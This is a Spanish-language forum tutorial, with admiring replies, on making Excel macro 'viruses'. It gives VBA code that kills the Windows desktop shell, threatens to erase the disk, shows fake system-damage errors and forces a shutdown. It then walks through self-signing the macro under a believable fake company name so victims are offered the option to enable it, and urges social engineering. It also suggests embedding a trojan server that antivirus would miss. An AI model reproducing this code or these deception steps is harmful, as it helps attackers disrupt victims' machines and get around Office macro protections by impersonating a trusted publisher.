Shell Root

Índice

1. ¿Qué son los virus Macros? - Introducción
2. Primer "Virus" Macro
3. Creando nuestras propias firmas digitales para poder ejecutar las órdenes

1 ¿Qué son los virus Macros? - Introducción

Todos sabemos, y cuando digo todos son los que han leido a cerca del tema, que Microsoft Office incluye en su pack de aplicaciones como son Word, Excel, Access, etc, una versión de Visual Basic un poco menos ligera para incluir funciones que programemos nosotros a nuestros documentos, hojas de cálculo, etc.

Bien, la función que tienen se llama Macro, es una herramienta la cual nos permite incluir en nuestras aplicaciones de texto, hojas de calculo y todo eso, una programación que hayamos hecho nosotros en el lenguaje Basic.

Usaremos Microsoft Excel (de aquí en adelante lo llamaremos Excel para no armarnos más líos), ya que es la herramienta que más facilidad y flexibilidad nos ofrece a la hora de la creación de éste tipo de virus, porque por ejemplo Word desactiva directamente las Macros cada vez que se reinicia.

De esa forma, un sistema atacado ejecutaría la hoja pero aparentemente no ocurriría nada, ya que la ejecucion del archivo solo mostraría un texto o una hoja de calculo, mientras que en segundo plano el código que lleva consigo esta realizando sus funciones, que pueden ir desde apagar un sistema, colapsarlo, y hasta incluso conseguir propagarse por más archivos de texto del mismo estilo.

2 Primer "Virus" Macro

Ha llegado la hora de la verdad, vamos a intentar crear nuestro primer Virus Macro!

Abrimos nuestro Excel, yo he usado la versión 2003, podeis usar versiones anteriores o posteriores porque supongo que las Macros no habrán sido anuladas.

Una vez en la tabla de Excel debemos tener a mano las herramientas de Visual Basic para comenzar, para ello damos un click en Herramientas, Personalizar, Barras de herramientas, dejamos todo como está y buscamos abajo la casilla Visual Basic.

La marcamos y le damos a Cerrar:



Bien, ahora veremos que se nos desplegó un panel como éste:



Ese panel es el panel de herramientas Visual Basic que nos ofrece Excel, en el distinguimos los siguientes componentes:

• Una flechita: Para ejecutar la Macro
• Una bola: Ni idea, no tocar.
• Un icono cuadrado con una cosa roja y amarilla: Editor del codigo de Visual Basic
• Un martillo y una llave inglesa: Herramientas de Visual Basic (botones, cajas de texto, etc...)
• Una escuadra, un lápiz y una regla: Modo Diseño
• Y el símbolo de Visual Studio: Para abrir el Microsoft Script Editor, si no sabeis programar en ese lenguaje (como yo) no toqueis nada.

De momento nos quedamos con el martillito, que es el que nos abrirá las herramientas de VB.

Lo damos un click y se nos abrirá un panel:



Vamos por ejemplo a poner un Botón.

Una vez puesto el botón lo damos dos clicks y se nos abrirá el Visual Basic, el de toda la vida sin tener que instalarlo, para que metamos código a el Botón, le ponemos por ejemplo:

Código:

Private Sub CommandButton1 _Click()
MsgBox ("Hola, soy un intento de virus Macro >:-)")
End Sub

Y lo corremos con el botón tal y como aparece señalado en la imagen:



Ahora el solo se nos volverá a la hoja de cálculo y una ventanita emergente dira:
Hola, soy un intento de virus Macro >:-)

Bien, está bien, pero queremos algo mejor, algo superior a una ventana emergente que diga eso.

Bueno, esto se puede mejorar pero depende de la programación que tenga cada uno, vamos por ejemplo a hacer un virus que sea un poco pesadín, de estos que insultan un rato y luego te apagan el sistema y todo eso.

Es simple, es como estar jugando con VB, yo hice un tipico virus de esos hechos en Batch pero con VB, aquí el code:

Código:

Private Sub CommandButton1 _Click()
MsgBox "Muahahahahahha, has abierto la caja de pandora, por ello ahora deberás realizar esa operacion si no quieres que tu disco duro se quedo VACIO, solo dispones de un intento, así que suerte!"
MsgBox "Por si acaso te quito tu escritorio ya que probablemente querrás sacar tu linda calculadora ^^"
MsgBox "Ah, por cierto, no intentes cerrarme ya que si lo consigues tu disco se irá conmigo"
Shell ("taskkill /f /im explorer.exe")
CommandButton2 .ForeColor = RGB(128, 0, 255)
End Sub


Private Sub CommandButton2 _Click()
If TextBox1.Text = "44460475362551 92" Then
MsgBox "Wow, veo que eres chico listo, has pasado la prueba!"
Shell ("explorer.exe")
Shell ("taskkill /f /im excel.exe")
Else
MsgBox "Maaaaaaaaaaaaa aaal, muy maaaaaaaaal, lo siento!"
MsgBox "Orden de línea de comandos: del %windir%"
MsgBox "Orden de línea de co a dos:  orden daña a, revis los archi os de sis ema"
Shell ("shutdown.exe -s -t 60 -c SYSTEM user has started a emergency reboot by a hard error in the system files, check the disk ")
EndIf
End Sub

Le añadí dos botones que realizan lo que se vé, un Label y una caja de Texto.

Lo que hace ese code es cerrar explorer.exe y amenazar con unos mensajes despúes verifica si la operación 129837218 * 34243244 es 4446047536255192, si es incorrecto da unos falsos mensajes de sistema dañado, lo típico, sino devuelve el escritorio y cierra el "virus".

Bueno, eso es un poquito lo que se refiere a virus macro, claro que la tontería que he hecho ahí no llega ni a virus, pero pensad, ese Visual Basic que Excel trae tiene todos los controles, incluido Winsock...

No sé, me viene a la cabeza la idea de con tener el source de un servidor de troyano (por ejemplo) podríamos hacer que una hoja de cálculo de Excel se convirtiera en un servidor de troyano y sin ser detectado por el AV.

Más o menos ya sabemos como funciona la cosa, pero sigue habiendo una pega, Excel por defecto deshabilita los Macros (ya que la seguirdad está marcada como alta) de archivos de Excel desconocidos, bueno, para eso deberemos crear una firma digital que Excel reconocerá y nos dará a elegir si ejecutar o no.

3 Creando nuestras propias firmas digitales para poder ejecutar las órdenes

Bueno, si hemos guardado nuestro proyecto y lo queremos abrir o otra persona lo quiere abrir se le aparecerá algo tal que así:



Eso ocurre debido a que no hay una firma digital que diga que ese archivo está firmado (obvio, ¿no? XD).

Pero no hay problema, solo tenemos que crearlo:
Inicio, Microsoft Office, Herramientas de Microsoft Office, Certificado digital para proyectos de VBA.

Se nos abrirá un formulario en el que tenemos una caja de texto en la que introducir el nombre de la firma, le ponemos algo creíble, como por ejemplo:

Simple Soft Technologies



Guay, ya tenemos nuestra firma digital para incluir a archivos, ahora como es lógico procederemos a incluirlos.

Para firmar la aplicación, en el menú Herramientas, click en Opciones y le damos a la pestaña Seguridad.
Click en Firmas digitales.
Click en Agregar.

Ahí nos aparecerá la firma que anteriormente creamos:



Aceptamos todo después, y ahora toca firmar la Macro:

En el menú Herramientas, Macro, click en Editor de Visual Basic.
En el Explorador de proyectos, seleccionamos lo que queremos firmar, es decir, la hoja en la que esté la macros, seleccionamos la Hoja1 (Hoja1)
En el menú Herramientas y con la Hoja1 seleccionada le damos a Firma digital.

Y ahí le damos a Elegir y seleccionamos nuestro certificado:



Y le damos otra vez dos veces a Aceptar.
Bueno, ya tenemos firmadas nuestras aplicaciones, ahora le damos a Guardar y aceptamos el mensaje de que se quitarán las firmas, a eso ni caso.

Ahora verifiquemos que nos funciona la firma, abrimos nuestro archivo de Excel y...



Ahí lo tenemos!!

Ya tenemos la opción de Habilitar o Deshabilitar la macros sin necesidad de mover configuraciones, yeah!

Con eso y un poquito de ingeniería social podéis llegar a cualquier cosa!

__________________
.
.
.
.

rubencho

oooooooooooooooooooooooo gracias viejo
muy bueno te felicito ok

*Ghost*

Interesante la verdad no conocía el funcionamiento de los virus Macro, lo malo es que en office 2007 vienen deshabilitados lo macros por defecto y el icono del archivo cambia lo que hace que sea reconocido fácilmente. habrá que probar lo de las firmas digitales.

Dejo dos enlaces que hablan sobre los Macros en Excel:
Tutoriales de VBA-Macros---Excel---Word---Ou

Muy buen aporte.
Saludos.

__________________

Blog de Informàtica y programaciòn

Orphen

jejeje esta muy bueno

__________________